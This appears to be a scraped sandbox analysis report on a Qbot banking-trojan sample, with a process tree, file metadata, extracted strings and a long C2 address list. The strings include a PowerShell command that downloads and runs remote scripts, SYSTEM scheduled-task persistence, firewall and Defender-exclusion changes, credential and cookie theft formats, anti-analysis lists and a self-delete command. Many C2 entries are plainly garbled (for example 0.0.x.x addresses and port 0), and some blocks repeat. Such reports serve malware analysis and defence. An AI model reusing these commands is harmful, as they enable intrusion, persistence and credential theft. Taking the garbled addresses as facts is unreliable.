https://cdn.speedof.me/sample4096k.bin?r=0.%u

https://en.wikipedia.org/static/apple-touch/wikipedia.png

ignore_url

image/gif

image/jpeg

image/pjpeg

ivm-inject.dll

jHxastDcds)oMc=jvh7wdUhxcsdt2

kernel32.dll

mcshield.exe

metsvc-server.exe

mlwr_smpl

mpr.dll

netapi32.dll

netsh advfirewall firewall add rule name="%s" dir=in action=allow program="%s" enable=yes

netsh firewall set allowedprogram "%s" %s ENABLE

netteller.com

nspr4.dll

nss3.dll

ntdll.dll

powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1'); IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1'); Invoke-MainWorker -Command '%s'"

pstorec.dll

qbot_conf_path='%S' username='%S'

qbot_run_mutex='%s' username='%S'

reg.exe ADD "HKLM\%s" /f /t %s /v "%s" /d "%s"

rsabase.dll

rsaenh.dll

sample

sbtisht

send

set_url

shell32.dll

siteadvisor.com;avgthreatlabs.com;safeweb.norton.com

srootkit

t=%s time=[%02d:%02d:%02d-%02d/%02d/%d]

tcpdump.exe;windump.exe;ethereal.exe;wireshark.exe;ettercap.exe;rtsniff.exe;packetcapture.exe;capturenet.exe

urlmon.dll

user32.dll

vSockets

vkise.exe;isesrv.exe;cmdagent.exe

vm3dmp

vmacthlp.exe

vmdebug

vmnat.exe

vmrawdsk

vmscsi

vmtoolsd.exe

vmx_svga

vmxnet

wbj.go

webinjects.cb

windbg.exe;ChromeUpdate.exe;msdev.exe;dbgview.exe;ollydbg.exe;ctfmon.exe;Proxifier.exe;nav.exe;Microsoft.Notes.exe;ShellExperienceHost.exe;SecHealthUI.exe

windump.exe

wininet.dll

wpcap.dll

wpl

wpq

ws2_32.dll

wtsapi32.dll

{%02X%02X%02X%02X-%02X%02X-%02X%02X-%02X%02X-%02X%02X%02X%02X%02X%02X}

(PID) Process(5808) explorer.exe

Botnetspx55

Campaign1579782661

Version324.8

C2 (576)0.0.10.65:25460

0.0.117.110:25460

0.0.169.49:14124

0.0.32.91:12600

0.0.99.111:28259

0.12.44.32:24873

0.128.16.59:32013

0.128.85.32:11570

0.153.233.120:26940

0.17.232.198:63477

0.180.114.119:25444

0.187.212.32:8752

0.195.97.95:29035

0.196.3.188:26989

0.2.64.159:8254

0.226.195.225:15923

0.26.109.109:24433

0.28.226.23:11891

0.40.17.170:10587

0.45.40.44:54318

0.48.49.53:19001

0.83.115.119:594

0.96.0.152:10299

1.0.111.110:28005

1.0.59.3:19887

1.154.8.101:28277

1.29.102.111:29216

1.60.32.43:18035

1.88.3.30:28778

10.125.13.10:29039

10.244.49.22:964

100.101.102.34:15136

100.101.65.116:10345

100.113.108.119:15648

100.121.122.119:29014

100.32.72.1:12131

100.44.32.108:26726

100.59.59.25:41472

100.61.3.144:36955

100.97.197.46:29793

101.0.105.47:10290

101.100.170.133:33045

101.109.40.39:1024

101.120.76.8:30817

101.122.99.40:29505

101.132.80.161:14352

101.168.251.193:46472

101.172.2.254:10049

101.202.154.21:12363

101.40.22.0:12124

101.88.79.98:27237

101.97.110.117:10394

102.106.154.16:37731

102.107.98.117:30823

102.108.111.111:568

102.108.41.123:40625

102.111.177.80:1359

102.92.114.92:28188

103.106.116.99:55809

103.126.27.147:2307

103.128.54.16:14133

103.32.61.153:2695

103.40.97.122:36096

104.105.107.108:28014

104.39.44.113:24420

104.91.161.134:131

104.99.115.113:43085

105.101.181.79:26003

105.108.101.40:50243

105.110.103.46:26226

105.110.146.119:32

105.111.40.88:10507

105.112.119.98:28260

105.116.101.105:29796

105.116.97.192:45316

105.172.18.207:45277

105.43.61.32:13437

105.45.51.93:8286

105.60.66.88:91

105.61.32.48:5642

105.97.97.122:24946

106.101.110.7:4

106.103.100.30:11120

106.29.43.30:18801

106.5.65.29:27165

107.113.97.44:8292

107.120.100.61:8226

107.174.241.70:1590

108.101.0.0:11379

108.101.101.112:10289

108.115.101.32:32826

108.211.26.0:0

108.83.33.20:143

108.99.123.105:2261

109.106.114.100:215

109.112.162.139:29224

109.30.32.38:788

109.9.14.149:5353

109.97.119.104:28527

11.120.14.44:8243

11.178.15.192:9455

110.100.40.250:6151

110.100.64.84:10939

110.119.111.61:576

110.206.103.35:58239

110.234.26.144:39965

110.32.107.115:24439

110.60.60.22:41216

110.93.162.108:10413

111.103.114.97:27972

111.110.116.105:28277

111.116.111.116:31088

111.227.232.224:11058

112.100.105.32:15842

112.101.110.40:8775

112.102.204.101:28543

112.108.105.99:24898

112.111.110.115:25940

112.56.11.60:58129

113.114.115.116:30070

113.119.169.34:41175

113.26.105.114:24577

114.115.40.41:8252

115.0.142.162:22645

115.100.112.99:2560

115.102.118.100:29952

115.108.112.100:27511

115.116.114.133:99

115.116.43.201:19309

115.203.51.72:512

115.41.59.95:63685

115.47.48.120:12592

116.100.61.173:7252

116.106.98.102:30510

116.112.116.119:27248

116.116.112.82:25969

116.117.115.47:12848

116.14.66.72:43041

116.221.27.57:28065

116.95.121.99:256

117.108.95.109:59905

117.114.110.197:53251

117.118.138.11:25132

117.99.41.32:31501

118.105.99.101:8747

118.92.43.188:192

119.120.121.249:322

119.32.2.0:22605

119.32.34.120:28012

119.40.0.0:31078

119.40.49.53:12600

12.20.106.32:11091

120.112.102.104:27751

120.119.102.64:11597

120.196.38.65:12332

120.44.32.111:30830

121.106.88.165:54343

121.107.107.119:10619

121.2.48.10:39524

121.99.118.103:25640

122.167.144.206:18491

122.99.95.105:31089

123.137.157.86:52405

123.224.75.22:15205

123.76.8.50:10

123.97.100.114:25713

125.99.97.116:8454

126.1.128.78:26990

126.102.48.92:8738

126.116.56.57:14644

128.165.121.41:8286

128.199.85.84:11569

128.80.136.32:20577

129.49.56.50:240

13.10.198.177:11622

13.141.195.18:10555

13.40.245.56:56678

130.116.41.32:19301

133.137.174.151:41363

133.60.75.151:55067

134.226.41.246:17779

137.48.14.11:15648

139.177.219.213:1040

139.56.202.63:49701

139.94.205.202:8229

14.124.94.67:28528

14.157.216.67:144

140.151.131.200:35074

141.9.125.4:28788

143.133.77.169:51090

143.254.123.226:34681

145.75.34.211:10076

145.99.142.106:41179

147.117.150.133:889

147.84.82.32:23586

148.164.36.106:8353

148.253.255.113:26699

149.185.175.179:27306

149.226.119.1:36434

15.100.98.107:55946

15.50.15.112:29306

152.254.116.116:27493

154.71.3.1:24722

155.10.116.102:26921

156.18.117.121:29795

158.146.33.40:7168

159.135.128.20:25718

159.151.110.44:8303

16.0.20.99:26740

16.166.232.42:8235

16.28.65.29:5748

160.0.18.51:11313

160.0.44.49:12592

161.18.14.0:6022

163.123.115.103:214

163.173.194.80:2316

164.0.5.45:25185

165.8.40.105:8235

168.248.91.34:9984

168.37.95.221:17137

17.142.5.38:13113

176.18.115.111:29453

176.59.32.121:4283

177.144.250.8:13912

177.195.9.60:60436

177.88.97.76:61440

178.0.111.40:28518

179.40.49.54:10540

179.85.11.205:19745

18.97.44.32:13609

182.101.101.95:28535

186.40.126.98:47134

187.130.103.101:29791

188.68.23.13:11296

192.16.51.93:11296

192.76.43.50:10808

194.16.227.17:15317

195.31.53.49:13513

196.35.143.48:16478

196.43.61.58:17822

197.216.244.91:10978

199.141.10.18:22896

2.1.104.37:13345

2.185.116.105:37125

20.1.44.97:30821

20.13.41.41:8229

20.45.56.8:12596

200.61.43.34:8239

201.98.50.145:8761

202.248.95.233:21158

203.20.112.44:64780

204.161.37.9:12742

204.34.49.49:12345

207.42.1.45:28517

21.58.37.138:32802

213.44.66.217:39486

214.222.99.148:43377

214.87.83.99:29289

215.176.46.69:28278

215.36.112.122:26215

219.59.152.61:40320

220.91.80.69:12915

220.98.242.97:15136

224.160.220.59:37437

224.21.52.32:31777

226.33.15.44:8293

226.93.172.88:47739

227.81.32.165:8232

228.110.114.116:28772

228.5.105.95:12848

228.9.96.69:27437

23.140.0.95:28267

24.32.121.32:49258

240.211.108.161:44575

248.135.202.74:18944

25.95.160.226:26222

250.37.10.100:55040

252.0.45.115:29793

252.213.8.28:23124

27.13.10.150:2823

28.102.122.197:17218

28.122.115.114:68

29.240.35.49:13856

29.54.44.49:13617

29.55.126.172:12

3.11.65.116:10280

32.101.116.67:35028

32.106.32.60:8245

32.119.104.105:22

32.119.115.105:25622

32.125.120.0:2418

32.134.12.133:9839

32.19.46.108:25966

32.214.46.115:49924

32.24.15.95:11069

32.3.21.189:17505

32.34.157.3:9556

32.34.34.212:36668

32.34.43.167:11042

32.34.43.64:456

32.47.32.50:49802

32.47.68.101:27749

32.47.70.0:2166

32.47.84.78:8226

32.48.197.18:12745

32.49.97.113:27247

32.60.232.115:25972

32.61.32.105:25716

32.62.32.34:11144

32.71.91.8:5296

32.97.108.109:25445

33.101.46.38:18576

33.20.26.215:256

33.4.128.208:8752

33.4.92.45:12813

33.80.44.153:34678

34.1.50.64:13173

34.131.113.157:26209

34.134.57.163:22061

34.43.0.24:55688

34.43.10.180:10283

34.43.34.116:28730

34.44.74.129:47657

34.77.83.88:19788

34.92.34.32:12115

34.92.92.34:11044

35.18.77.111:26434

35.192.1.0:35442

35.24.99.34:7760

35.33.183.152:2313

36.156.141.19:54041

37.49.0.0:11314

38.14.107.183:9792

38.16.16.59:15377

38.3.95.49:11898

38.49.184.0:22909

38.55.38.51:50754

38.62.251.137:50043

38.97.32.61:8282

39.150.226.199:16

4.192.82.32:26995

4.23.56.23:12336

4.99.101.108:34594

40.101.41.208:907

40.105.107.100:29030

40.122.110.100:28023

40.125.32.171:34418

40.196.10.246:2627

40.34.5.0:16708

40.34.80.114:28515

40.51.49.45:63493

40.97.227.209:10072

40.98.32.38:45128

41.18.63.232:9782

41.189.46.2:18041

41.29.32.32:384

42.28.122.29:34780

42.32.141.42:13106

42.32.56.80:10313

42.40.44.156:58329

42.47.44.32:10023

43.0.43.46:17784

43.117.120.106:27743

43.206.43.83:29810

43.253.170.224:15148

43.34.115.107:29592

43.34.49.50:13108

43.43.88.152:12297

43.61.32.49:13952

43.64.43.34:11892

44.118.11.42:24617

44.128.142.21:9818

44.135.97.149:11136

44.173.204.227:54230

44.32.101.110:26726

44.32.101.44:8292

44.32.121.99:26977

44.32.45.24:13356

44.49.50.192:62054

44.49.53.48:11314

44.50.53.51:11313

45.106.0.107:3954

45.132.58.0:41624

45.46.114.101:28780

46.112.104.112:44115

46.112.117.115:26765

46.173.64.213:55287

46.44.32.50:12565

46.97.112.112:27769

47.100.60.113:17249

48.120.70.70:10556

48.236.3.7:25328

48.32.63.32:22334

48.41.123.9:3338

48.42.217.138:53504

48.44.52.48:24757

48.93.44.32:29560

48.98.97.173:10292

49.198.24.156:13070

49.29.101.100:31093

49.42.182.0:1354

49.44.0.4:12600

49.48.57.44:12601

49.52.11.0:12332

49.55.56.44:32

5.10.93.62:15922

5.172.44.46:25976

5.182.219.119:23401

5.225.40.28:16135

5.28.44.49:14191

5.30.58.52:2288

50.44.49.49:518

50.44.76.204:5655

50.48.56.51:13363

50.49.54.44:12596

50.49.96.97:14390

50.50.128.55:174

50.50.51.73:12593

51.110.41.196:45487

51.112.103.119:26995

51.44.49.53:14636

51.50.41.120:62721

52.135.102.23:22854

52.32.41.46:29807

52.34.48.0:48574

52.44.50.53:11313

53.45.53.80:222

53.48.48.50:13369

53.51.226.98:8286

53.54.55.56:14689

54.100.107.97:23816

54.33.61.49:13312

54.38.32.48:30790

55.139.66.201:21248

55.51.51.56:14137

55.63.157.93:10062

56.0.124.61:8241

56.226.33.182:3932

56.57.11.16:14135

57.44.128.32:12849

57.44.55.35:12592

57.45.49.21:19020

57.74.53.44:12597

58.52.48.44:3500

59.0.0.21:30305

59.121.11.145:55591

59.205.100.87:33536

59.224.135.33:25121

59.32.43.43:26912

6.0.61.32:28261

6.160.85.13:2569

60.194.175.166:62729

60.199.234.42:54224

60.29.42.91:8222

60.88.221.16:11034

61.113.106.101:12038

61.254.88.89:3584

61.32.39.92:30768

61.32.4.215:19

61.32.40.0:7713

61.32.48.120:13361

61.32.48.59:2304

61.39.169.93:13620

61.44.75.21:44645

62.50.48.44:14358

62.52.241.67:13353

62.62.40.51:12845

64.101.99.104:28448

64.196.115.108:26979

64.42.111.120:26222

64.86.51.50:29548

65.114.114.97:31016

66.46.83.116:29285

66.9.126.174:53406

67.103.40.32:41157

67.114.101.97:2704

67.134.131.3:10337

67.32.79.78:17221

67.40.105.99:24504

67.68.69.70:0

69.76.32.92:8741

7.0.38.105:27763

7.50.9.24:59986

70.114.111.109:7195

70.9.212.20:33504

71.128.15.22:7981

71.168.78.8:16605

71.203.44.25:32947

73.212.113.42:8950

73.74.75.76:19790

76.79.56.193:45358

77.0.0.92:29800

77.105.110.117:30241

77.51.2.20:8775

78.129.108.113:26993

78.90.90.165:19791

79.4.40.100:29795

8.128.18.119:31340

80.111.71.33:29545

80.121.124.40:27396

80.182.166.55:41137

80.33.45.56:13101

80.37.11.172:63660

81.82.83.84:21846

82.114.120.105:29044

82.117.110.40:36908

82.16.46.217:135

82.67.25.110:30060

82.75.101.68:30726

82.85.80.192:29036

83.0.56.51:11314

83.0.83.79:11576

83.101.5.8:29302

83.104.101.108:27694

84.105.22.30:28005

84.29.34.128:7806

85.76.76.24:60028

86.1.52.48:12343

86.120.112.99:26404

87.88.84.90:0

88.0.111.116:28788

88.143.97.28:12316

88.222.78.32:31818

88.232.33.214:15100

9.102.0.128:11054

9.105.102.32:10278

9.13.10.9:2935

9.25.237.32:15392

9.28.205.0:19567

9.54.93.44:8241

9.97.61.226:15136

9.98.66.12:29285

90.61.107.110:0

91.105.93.177:14947

91.105.93.34:129

91.40.108.5:1964

91.49.55.51:12853

91.50.93.126:10767

92.215.14.128:1822

92.39.32.43:8288

92.92.34.226:12141

93.133.18.254:201

93.250.67.134:42

93.41.141.112:11290

93.61.32.77:24948

94.67.242.24:16594

95.0.100.101:27680

95.100.99.115:30820

95.111.108.11:35487

95.32.94.86:3775

96.213.41.32:26209

96.56.53.57:49928

96.84.84.80:8837

97.101.109.120:10296

97.106.118.107:9799

97.109.101.59:1359

97.110.100.111:27944

97.118.101.84:28486

97.39.41.218:56311

98.101.105.121:28791

98.101.32.14:10528

98.104.106.119:41608

98.111.82.212:55257

98.118.98.17:29037

98.122.97.40:31090

98.26.207.161:17098

98.41.59.77:52547

98.44.108.44:34242

98.45.111.40:12481

98.75.128.26:58194

99.104.97.114:17263

99.114.111.115:28518

99.114.118.37:25193

99.152.12.156:34915

99.73.71.122:25951

99.80.72.19:11662

SaltjHxastDcds)oMc=jvh7wdUhxcsdt2

Strings (433)/F

/c ping.exe -n 6 127.0.0.1 & type "%s\System32\calc.exe" > "%s"

/ru ""

[begin]

[end]

cookie=[%s]

data=[%s]

exe=[%s] cmdline=[%s] pid=[%u] username=[%s]

ext_ip=[%s] dnsname=[%s] hostname=[%s] user=[%S] domain=[%S] is_admin=[%s] os=[%s] qbot_version=[%s] install_time=[%s] exe=[%S] prod_id=[%s]

host=[%s:%u] user=[%s] pass=[%s]

referer=[%s]

url=[%s]

url=[%s] data=[%s]

url=[%s] lb=[%s] data=[%s]

url=[%s] user=[%s] pass=[%s]

"%s\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn %s /tr "\"%s\" /I %s" /SC ONCE /Z /ST %02u:%02u /ET %02u:%02u

"%s\system32\schtasks.exe" /DELETE /F /TN %s

"%s\system32\schtasks.exe" /create /tn %S /tr "%s" /sc %S

%%%BOT_NICK%%%

%02u.%02u.%02u-%02u/%02u/%04u

%BOTID%

%BOT_COMPUTERNAME%

%BOT_MACHINE_UUID%

%BOT_USERDOMAIN%

%BOT_USERNAME%

%BOT_VENDOR_ID%

%ProgramFiles%\Internet Explorer\iexplore.exe

%ProgramFiles(x86)%\Internet Explorer\iexplore.exe

%SystemRoot%\SysWOW64\explorer.exe

%SystemRoot%\SysWOW64\mobsync.exe

%SystemRoot%\System32\mobsync.exe

%SystemRoot%\explorer.exe

%s "$windowsupdate = \"%s\"; & $windowsupdate"

%s %04x.%u %04x.%u res: %s seh_test: %u consts_test: %d vmdetected: %d createprocess: %d

%s \"$windowsupdate = \\\"%s\\\"; & $windowsupdate\"

%s%s/dupinst.php?n=%s&bg=%s&r=%u

%s\%s.vbs

%s\System32\WindowsPowerShell\v1.0\powershell.exe "$windowsupdate = \"%s\"; & $windowsupdate"

%s\System32\WindowsPowerShell\v1.0\powershell.exe \"$windowsupdate = \\\"%s\\\"; & $windowsupdate\"

%u.%s.%s.%08x

*/*

.cfg

.dat

.dll

.exe

.lnk

/bot_serv

/t3

000

1234567890

23.49.13.33:7000

307

308

309

310

311

ADMIN$

ALLUSERSPROFILE

AdjustTokenPrivileges

Administrator

AllocateAndInitializeSid

AvastSvc.exe

ByteFence.exe

C:\\INTERNAL\\__empty

CWSandbox

CertAddCRLContextToStore

CertAddCTLContextToStore

CertAddCertificateContextToStore

CertCloseStore

CertCreateCertificateChainEngine

CertDuplicateCRLContext

CertEnumCertificatesInStore

CertEnumSystemStore

CertFreeCRLContext

CertFreeCertificateChain

CertFreeCertificateChainEngine

CertFreeCertificateContext

CertGetCRLContextProperty

CertGetCertificateChain

CertGetEnhancedKeyUsage

CertGetNameStringW

CertOpenStore

CertSetCertificateContextProperty

CloseHandle

CloseServiceHandle

Content-Type: application/x-www-form-urlencoded

CreateDirectoryA

CreateFileA

CreateFileW

CreateProcessA

CreateProcessW

CreateRemoteThread

CreateServiceW

CreateThread

CreateToolhelp32Snapshot

CreateWindowExA

CredEnumerateA

CredFree

CryptAcquireCertificatePrivateKey

CryptEnumOIDInfo

CryptFindOIDInfo

CryptUnprotectData

DefWindowProcA

DeleteFileA

DeleteService

DeleteServiceW

DeleteUrlCacheEntryW

DestroyWindow

DispatchMessageA

DnsQuery_A

DnsQuery_W

DynamicCodePolicy

ExpandEnvironmentStringsA

FindClose

FindFirstFileA

FindNextFileA

FindWindowA

FreeSid

FtpDeleteFileA

FtpGetFileA

FtpOpenFileA

GenuineIntel

GetClipboardData

GetCurrentDirectoryA

GetCurrentThreadId

GetForegroundWindow

GetMessageA

GetMessageW

GetModuleFileNameA

GetModuleHandleA

GetProcAddress

GetUrlCacheEntryInfoW

GetVolumeInformationA

Global\{EEE80B68-1EF4-47C2-9017-59E46A84F3BC}

HOURLY /mo 5

HttpAddRequestHeadersA

HttpOpenRequestA

HttpOpenRequestW

HttpQueryInfoA

HttpQueryInfoW

HttpSendRequestA

HttpSendRequestExA

HttpSendRequestExW

HttpSendRequestW

IPC$

Initializing database...

InterlockedCompareExchange

InternetCloseHandle

InternetConnectA

InternetCrackUrlA

InternetGetCookieA

InternetGetCookieExA

InternetGetLastResponseInfoA

InternetOpenA

InternetOpenUrlA

InternetQueryDataAvailable

InternetQueryOptionA

InternetQueryOptionW

InternetReadFile

InternetReadFileExA

InternetSetOptionA

InternetSetStatusCallback

InternetWriteFile

LdrGetProcedureAddress

LdrLoadDll

LoadLibraryA

LocalFree

LookupAccountSidA

LookupAccountSidW

MBAMService.exe

MessageBoxA

Microsoft

MicrosoftEdge.exe

Module32First

Module32Next

MoveFileA

Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0

MsMpEng.exe

NAT-PMP %u tcp

NetApiBufferFree

NetGetDCName

NetShareEnum

NetUserEnum

NetWkstaGetInfo

NtAllocateVirtualMemory

NtClose

NtCreateSection

NtFreeVirtualMemory

NtGetContextThread

NtMapViewOfSection

NtProtectVirtualMemory

NtQueryInformationProcess

NtQueryVirtualMemory

NtReadVirtualMemory

NtSetContextThread

NtUnmapViewOfSection

NtWow64QueryInformationProcess64

NtWow64ReadVirtualMemory64

NtWriteVirtualMemory

ObtainUserAgentString

OpenProcess

OpenSCManagerW

OpenThread

PFXExportCertStore

PR_Close

PR_GetError

PR_GetNameForIdentity

PR_OpenTCPSocket

PR_Read

PR_SetError

PR_Write

PStoreCreateInstance

PeekMessageA

PeekMessageW

PostMessageA

PostQuitMessage

Process32First

Process32Next

ProfileImagePath

QEMU

QueryFullProcessImageNameW

Query_Main

RapportGP.DLL

ReadFile

ReadProcessMemory

Red Hat VirtIO

RegCloseKey

RegCreateKeyExA

RegDeleteValueA

RegEnumKeyExA

RegEnumValueA

RegOpenKeyExA

RegQueryInfoKeyA

RegQueryValueExA

RegSetValueExA

RegisterClassExA

RtlGetVersion

RtlNtStatusToDosError

RtlSetLastWin32Error

SAVAdminService.exe;SavService.exe

SOFTWARE\Microsoft\Internet Explorer\CodeIntegrity

SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet

SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths

SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths

SOFTWARE\Microsoft\Windows Defender\SpyNet

SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet

SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet

SbieDll.dll

Self test FAILED!!!

Self test OK.

SendMessageA

SetCurrentDirectoryA

SetEndOfFile

SetEntriesInAclA

SetFilePointer

SetLastError

SetNamedSecurityInfoA

ShellExecuteA

ShowWindow

SpyNetReporting

StackWalk64

StartServiceW

SubmitSamplesConsent

TranslateMessage

UnregisterClassA

UpdateWindow

VBoxGuest

VBoxVideo

VMAUDIO

VMware Accelerated

VMware Pointing

VMware Replay

VMware SCSI

VMware SVGA

VMware VMaudio

VMware Vista

VMware server memory

Virtual HD

VirtualAllocEx

VirtualFreeEx

VirtualProtect

VirtualProtectEx

WBJ_IGNORE

WEEKLY /D TUE,WED /ST 12:00:00

WNetAddConnection2W

WNetCancelConnection2W

WNetCloseEnum

WNetEnumResourceW

WNetOpenEnumW

WRSA.exe

WSAConnect

WSAGetLastError

WSASend

WSASetLastError

WTSEnumerateSessionsW

WTSFreeMemory

WTSQueryUserToken

WaitForSingleObject

Windows10 Edge HttpQueryInfo Bug!!!

WriteFile

WriteProcessMemory

ZwQueryInformationThread

ZwResumeThread

\sf2.dll

aabcdeefghiijklmnoopqrstuuvwxyyz

aaebcdeeifghiiojklmnooupqrstuuyvwxyyaz

abc

abcdefghijklmnopqrstuvwxyz

administrator,argo,operator,administrador,user,prof,owner,usuario,admin,HP_Administrator,HP_Owner,Compaq_Owner,Compaq_Administrator

advapi32.dll

ansfltr

application/x-shockwave-flash

artifact.exe

aswhooka.dll

aswhookx.dll

avcuf32.dll

avgcsrvx.exe;avgsvcx.exe;avgcsrva.exe

avp.exe

bdagent.exe;vsserv.exe;vsservppl.exe

c:\hiberfil.sysss

cashmanagementconnectionstring

ccSvcHst.exe

chrome.dll

chrome_child.dll

cmd /c schtasks.exe /Query > "%s"

cmd.exe /C \"start /MIN %s\system32\cscript.exe //E:javascript \"%s\"\"

cmd.exe /c ping -n 10 localhost && rmdir /S /Q "%s"

cmd=1&msg=%s&ports=

connect

content.bigflimz.com

coreServiceShell.exe;PccNTMon.exe;NTRTScan.exe

crypt32.dll

cryptui.dll

cscript.exe

data_after

data_before

data_end

data_inject

dbghelp.dll

dnsapi.dll

egui.exe;ekrn.exe

error res='%s' err=%d len=%u

exclude_url

explorer.exe

firefox.exe

fmon.exe

fshoster32.exe

https://

https://cdn.speedof.me/sample4096k.bin?r=0.%u

https://en.wikipedia.org/static/apple-touch/wikipedia.png

ignore_url

image/gif

image/jpeg

image/pjpeg

ivm-inject.dll

jHxastDcds)oMc=jvh7wdUhxcsdt2

kernel32.dll

mcshield.exe

metsvc-server.exe

mlwr_smpl

mpr.dll

netapi32.dll

netsh advfirewall firewall add rule name="%s" dir=in action=allow program="%s" enable=yes

netsh firewall set allowedprogram "%s" %s ENABLE

netteller.com

nspr4.dll

nss3.dll

ntdll.dll

pstorec.dll

qbot_conf_path='%S' username='%S'

qbot_run_mutex='%s' username='%S'

reg.exe ADD "HKLM\%s" /f /t %s /v "%s" /d "%s"

rsabase.dll

rsaenh.dll

sample

sbtisht

send

set_url

shell32.dll

siteadvisor.com;avgthreatlabs.com;safeweb.norton.com

srootkit

t=%s time=[%02d:%02d:%02d-%02d/%02d/%d]

tcpdump.exe;windump.exe;ethereal.exe;wireshark.exe;ettercap.exe;rtsniff.exe;packetcapture.exe;capturenet.exe

urlmon.dll

user32.dll

vSockets

vkise.exe;isesrv.exe;cmdagent.exe

vm3dmp

vmacthlp.exe

vmdebug

vmnat.exe

vmrawdsk

vmscsi

vmtoolsd.exe

vmx_svga

vmxnet

wbj.go

webinjects.cb

windbg.exe;ChromeUpdate.exe;msdev.exe;dbgview.exe;ollydbg.exe;ctfmon.exe;Proxifier.exe;nav.exe;Microsoft.Notes.exe;ShellExperienceHost.exe;SecHealthUI.exe

windump.exe

wininet.dll

wpcap.dll

wpl

wpq

ws2_32.dll

wtsapi32.dll

{%02X%02X%02X%02X-%02X%02X-%02X%02X-%02X%02X-%02X%02X%02X%02X%02X%02X}

No Malware configuration.

Add for printing

TRiD

.exe	\|	Generic Win/DOS Executable (50)
.exe	\|	DOS Executable Generic (49.9)

EXIF

EXE

MachineType:	Intel 386 or later, and compatibles
TimeStamp:	2020:01:22 21:38:11+00:00
ImageFileCharacteristics:	No relocs, Executable, 32-bit
PEType:	PE32
LinkerVersion:	7.23
CodeSize:	49152
InitializedDataSize:	22528
UninitializedDataSize:	-
EntryPoint:	0x2530
OSVersion:	5.1
ImageVersion:	5
SubsystemVersion:	5
Subsystem:	Windows GUI
FileVersionNumber:	6.5.1042.0
ProductVersionNumber:	6.5.1042.0
FileFlagsMask:	0x003f
FileFlags:	(none)
FileOS:	Win32
ObjectFileType:	Executable application
FileSubtype:	-
LanguageCode:	English (U.S.)
CharacterSet:	Unicode
Comments:	-
CompanyName:	Microsoft C
FileDescription:	Macedo
FileVersion:	6.5.1042
InternalName:	xseja
LegalCopyright:	© Microsoft Corpo
LegalTrademarks:	-
OriginalFileName:	xsejan.dl
PrivateBuild:	-
ProductName:	Xseja
ProductVersion:	6.5.1042
SpecialBuild:	-

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

144

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID

CMD

Path

Indicators

Parent process

592

C:\Users\admin\AppData\Roaming\Microsoft\Olhgykmnnfgq\fsoevv.exe /C

C:\Users\admin\AppData\Roaming\Microsoft\Olhgykmnnfgq\fsoevv.exe

fsoevv.exe

User:

admin

Company:

Microsoft C

Integrity Level:

MEDIUM

Description:

Macedo

Exit code:

Version:

6.5.1042

Modules

Images
c:\users\admin\appdata\roaming\microsoft\olhgykmnnfgq\fsoevv.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\ole32.dll

2128

C:\Users\admin\AppData\Roaming\Microsoft\Olhgykmnnfgq\fsoevv.exe

444444.png.exe

User:

admin

Company:

Microsoft C

Integrity Level:

MEDIUM

Description:

Macedo

Exit code:

Version:

6.5.1042

Modules

Images
c:\users\admin\appdata\roaming\microsoft\olhgykmnnfgq\fsoevv.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\ole32.dll

2848

"C:\Users\admin\AppData\Local\Temp\444444.png.exe"

C:\Users\admin\AppData\Local\Temp\444444.png.exe

explorer.exe

User:

admin

Company:

Microsoft C

Integrity Level:

MEDIUM

Description:

Macedo

Exit code:

Version:

6.5.1042

Modules

Images
c:\users\admin\appdata\local\temp\444444.png.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\ole32.dll

Qbot

(PID) Process(2848) 444444.png.exe

Botnetspx55

Campaign1579782661

Version324.8

C2 (576)0.0.10.65:25460

0.0.117.110:25460

0.0.169.49:14124

0.0.32.91:12600

0.0.99.111:28259

0.12.44.32:24873

0.128.16.59:32013

0.128.85.32:11570

0.153.233.120:26940

0.17.232.198:63477

0.180.114.119:25444

0.187.212.32:8752

0.195.97.95:29035

0.196.3.188:26989

0.2.64.159:8254

0.226.195.225:15923

0.26.109.109:24433

0.28.226.23:11891

0.40.17.170:10587

0.45.40.44:54318

0.48.49.53:19001

0.83.115.119:594

0.96.0.152:10299

1.0.111.110:28005

1.0.59.3:19887

1.154.8.101:28277

1.29.102.111:29216

1.60.32.43:18035

1.88.3.30:28778

10.125.13.10:29039

10.244.49.22:964

100.101.102.34:15136

100.101.65.116:10345

100.113.108.119:15648

100.121.122.119:29014

100.32.72.1:12131

100.44.32.108:26726

100.59.59.25:41472

100.61.3.144:36955

100.97.197.46:29793

101.0.105.47:10290

101.100.170.133:33045

101.109.40.39:1024

101.120.76.8:30817

101.122.99.40:29505

101.132.80.161:14352

101.168.251.193:46472

101.172.2.254:10049

101.202.154.21:12363

101.40.22.0:12124

101.88.79.98:27237

101.97.110.117:10394

102.106.154.16:37731

102.107.98.117:30823

102.108.111.111:568

102.108.41.123:40625

102.111.177.80:1359

102.92.114.92:28188

103.106.116.99:55809

103.126.27.147:2307

103.128.54.16:14133

